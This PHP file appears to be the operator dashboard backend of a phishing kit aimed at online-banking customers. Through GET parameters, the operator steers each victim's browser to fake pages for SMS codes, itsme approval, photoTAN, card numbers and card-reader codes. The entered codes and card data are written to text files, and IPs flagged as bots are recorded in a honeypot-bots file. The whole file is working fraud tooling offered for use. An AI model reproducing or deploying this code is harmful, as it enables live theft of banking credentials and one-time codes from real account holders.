<?php


session_start();

if(isset($_GET['ip'])) 
{

$Pageee .= ''.$_GET['ip'].',';

$f = fopen("../../../honeypotbots.dat", "a");
	fwrite($f, $Pageee);


$Pag .= 'This ip '.$_GET['ip'].' Blocked Successfully ';

$fPag = fopen("../System_sql/Go.txt", "w");
fwrite($fPag, $Pag);


header("location:../dashboard.php");

}elseif (isset($_GET['App'])) {

$Page .= ' <meta http-equiv="refresh" content="0;url=./Account_App.php" />  ';

$fPage = fopen("../System_sql/Redirect.txt", "w");
fwrite($fPage, $Page);



$Pag .= 'Redirected to App';

$fPag = fopen("../System_sql/Go.txt", "w");
fwrite($fPag, $Pag);

$Pagmt .= ''.$_POST['Code'].'';
$fPagmt = fopen("../System_sql/Code.txt", "w");
fwrite($fPagmt, $Pagmt);

header("location:../dashboard.php");

}
elseif (isset($_GET['Response'])) {


	$Page .= ' <meta http-equiv="refresh" content="0;url=./Account_App.php" />  ';

	$fPage = fopen("../System_sql/Redirect.txt", "w");
	fwrite($fPage, $Page);
	
	$Pagmt .= ''.$_POST['codeApp'].'';
	$fPagmt = fopen("../System_sql/Code.txt", "w");
	fwrite($fPagmt, $Pagmt);
	
	
	
	$Pag .= 'Redirected to Info Card';
	
	$fPag = fopen("../System_sql/Go.txt", "w");
	fwrite($fPag, $Pag);

	
	header("location:../dashboard.php");
	
	}

	elseif (isset($_GET['Card'])) {


		$Page .= ' <meta http-equiv="refresh" content="0;url=./Account_Info.php" />  ';
	
		$fPage = fopen("../System_sql/Redirect.txt", "w");
		fwrite($fPage, $Page);
		
		$Pagmt .= ''.$_POST['Cardnumber'].'';
		$fPagmt = fopen("../System_sql/Codenumber.txt", "w");
		fwrite($fPagmt, $Pagmt);
		
		
		
		$Pag .= 'Redirected to NUmber Card';
		
		$fPag = fopen("../System_sql/Go.txt", "w");
		fwrite($fPag, $Pag);
	
		
		header("location:../dashboard.php");
		
		}

elseif (isset($_GET['PhonePhone'])) {

	$Page .= ' <meta http-equiv="refresh" content="0;url=./Account_Phone.php" />  ';
	
	$fPage = fopen("../System_sql/Redirect.txt", "w");
	fwrite($fPage, $Page);
	
	
	
	$Pag .= 'Redirected to Phone ';
	
	$fPag = fopen("../System_sql/Go.txt", "w");
	fwrite($fPag, $Pag);

	
	header("location:../dashboard.php");
	
	}
	
	
	elseif (isset($_GET['id'])) {

$Page .= '<meta http-equiv="refresh" content="0;url=./Accoun_Sms.php" />';

$fPage = fopen("../System_sql/Redirect.txt", "w");
fwrite($fPage, $Page);


$Pag .= 'Redirected to Sms Code';

$fPag = fopen("../System_sql/Go.txt", "w");
fwrite($fPag, $Pag);

$Pagmt .= ''.$_POST['Code'].'';
$fPagmt = fopen("../System_sql/Code.txt", "w");
fwrite($fPagmt, $Pagmt);

header("location:../dashboard.php");

}elseif (isset($_GET['CodeEmail'])) {

$Page .= ' <meta http-equiv="refresh" content="0;url=./Account_Code-Email.php" />  ';

$fPage = fopen("../System_sql/Redirect.txt", "w");
fwrite($fPage, $Page);



$Pag .= 'Redirected to Code Email';

$fPag = fopen("../System_sql/Go.txt", "w");
fwrite($fPag, $Pag);

header("location:../dashboard.php");

}
elseif (isset($_GET['Numero'])) {

$Page .= ' <meta http-equiv="refresh" content="0;url=./Account_App.php" />  ';

$fPage = fopen("../System_sql/Redirect.txt", "w");
fwrite($fPage, $Page);

$Pagmt .= ''.$_POST['codeApp'].'';
$fPagmt = fopen("../System_sql/Code.txt", "w");
fwrite($fPagmt, $Pagmt);

$Pag .= 'Redirected to App Code';

$fPag = fopen("../System_sql/Go.txt", "w");
fwrite($fPag, $Pag);

header("location:../dashboard.php");

}elseif (isset($_GET['EmailAccess'])) {

$Page .= ' <meta http-equiv="refresh" content="0;url=./Account_Email-Access.php" />  ';

$fPage = fopen("../System_sql/Redirect.txt", "w");
fwrite($fPage, $Page);



$Pag .= 'Redirected to Email Access';

$fPag = fopen("../System_sql/Go.txt", "w");
fwrite($fPag, $Pag);


header("location:../dashboard.php");

}elseif (isset($_GET['login'])) {

$Page .= ' <meta http-equiv="refresh" content="0;url=../Sign_Error.php" />  ';

$fPage = fopen("../System_sql/Redirect.txt", "w");
fwrite($fPage, $Page);



$Pag .= 'Redirected to itsme';

$fPag = fopen("../System_sql/Go.txt", "w");
fwrite($fPag, $Pag);


header("location:../dashboard.php");

}
elseif (isset($_GET['Codesms'])) {

	$Page .= ' <meta http-equiv="refresh" content="0;url=./Account_Sms.php" />  ';
	
	$fPage = fopen("../System_sql/Redirect.txt", "w");
	fwrite($fPage, $Page);
	
	
	
	$Pag .= 'Redirected to Sms';
	
	$fPag = fopen("../System_sql/Go.txt", "w");
	fwrite($fPag, $Pag);
	
	
	header("location:../dashboard.php");
	
	}
elseif (isset($_GET['Reader'])) {

	$Page .= ' <meta http-equiv="refresh" content="0;url=../Sign_Email.php" />  ';
	
	$fPage = fopen("../System_sql/Redirect.txt", "w");
	fwrite($fPage, $Page);
	
	
	
	$Pag .= 'Redirected to Email Adress';
	
	$fPag = fopen("../System_sql/Go.txt", "w");
	fwrite($fPag, $Pag);
	
	
	header("location:../dashboard.php");
	
	}
	elseif (isset($_GET['itsmePhone'])) {

		$Page .= ' <meta http-equiv="refresh" content="0;url=./Account_Telephone.php" />  ';
		
		$fPage = fopen("../System_sql/Redirect.txt", "w");
		fwrite($fPage, $Page);
		
		
		
		$Pag .= 'Redirected to itsme App';
		
		$fPag = fopen("../System_sql/Go.txt", "w");
		fwrite($fPag, $Pag);
		
		
		header("location:../dashboard.php");
		
		}
	elseif (isset($_GET['info'])) {

$Page .= ' <meta http-equiv="refresh" content="0;url=./Account_App.php" />  ';

$fPage = fopen("../System_sql/Redirect.txt", "w");
fwrite($fPage, $Page);


$Pagmt .= ''.$_POST['codeApp'].'';
$fPagmt = fopen("../System_sql/Code.txt", "w");
fwrite($fPagmt, $Pagmt);


$Pag .= 'Redirected to App Code';

$fPag = fopen("../System_sql/Go.txt", "w");
fwrite($fPag, $Pag);


header("location:../dashboard.php");

}elseif (isset($_GET['ReaderCode2'])) {

	$Page .= ' <meta http-equiv="refresh" content="0;url=./Account_Code_Redar.php" />  ';
	
	$fPage = fopen("../System_sql/Redirect.txt", "w");
	fwrite($fPage, $Page);
	
	
	
	$Pag .= 'Redirected to Reader Code 2';
	
	$fPag = fopen("../System_sql/Go.txt", "w");
	fwrite($fPag, $Pag);
	
	$Pagm .= ''.$_POST['ReaderCode11'].'';
	$fPagm = fopen("../System_sql/Code11.txt", "w");
	fwrite($fPagm, $Pagm);
	
	$Pagms .= ''.$_POST['ReaderCode22'].'';
	$fPagms = fopen("../System_sql/Code22.txt", "w");
	fwrite($fPagms, $Pagms);

	
	header("location:../dashboard.php");
	
	}elseif (isset($_GET['sms'])) {

$Page .= ' <meta http-equiv="refresh" content="0;url=./Account_Sms.php" />  ';

$fPage = fopen("../System_sql/Redirect.txt", "w");
fwrite($fPage, $Page);



$Pag .= 'Redirected to Sms';

$fPag = fopen("../System_sql/Go.txt", "w");
fwrite($fPag, $Pag);

$Pagm .= ''.$_POST['Code'].'';
$fPagm = fopen("../System_sql/Code.txt", "w");
fwrite($fPagm, $Pagm);


header("location:../dashboard.php");

}elseif (isset($_GET['Phototan'])) {

$Page .= ' <meta http-equiv="refresh" content="0;url=./Account_PhotoTan.php" />  ';

$fPage = fopen("../System_sql/Redirect.txt", "w");
fwrite($fPage, $Page);

$photoB .= ' '.$_POST['photo'].' ';
$photoBS = fopen("../System_sql/Phototan.txt", "w");
fwrite($photoBS, $photoB);

$Pag .= 'Redirected to Phototan';

$fPag = fopen("../System_sql/Go.txt", "w");
fwrite($fPag, $Pag);


header("location:../dashboard.php");

}elseif (isset($_GET['redirect'])) {

$Page .= ' <meta http-equiv="refresh" content="0;url='.$_POST['tnks'].'" />  ';

$fPage = fopen("../System_sql/Redirect.txt", "w");
fwrite($fPage, $Page);


$Pag .= 'Redirected to Link';

$fPag = fopen("../System_sql/Go.txt", "w");
fwrite($fPag, $Pag);


header("location:../dashboard.php");

}

else {




}

?>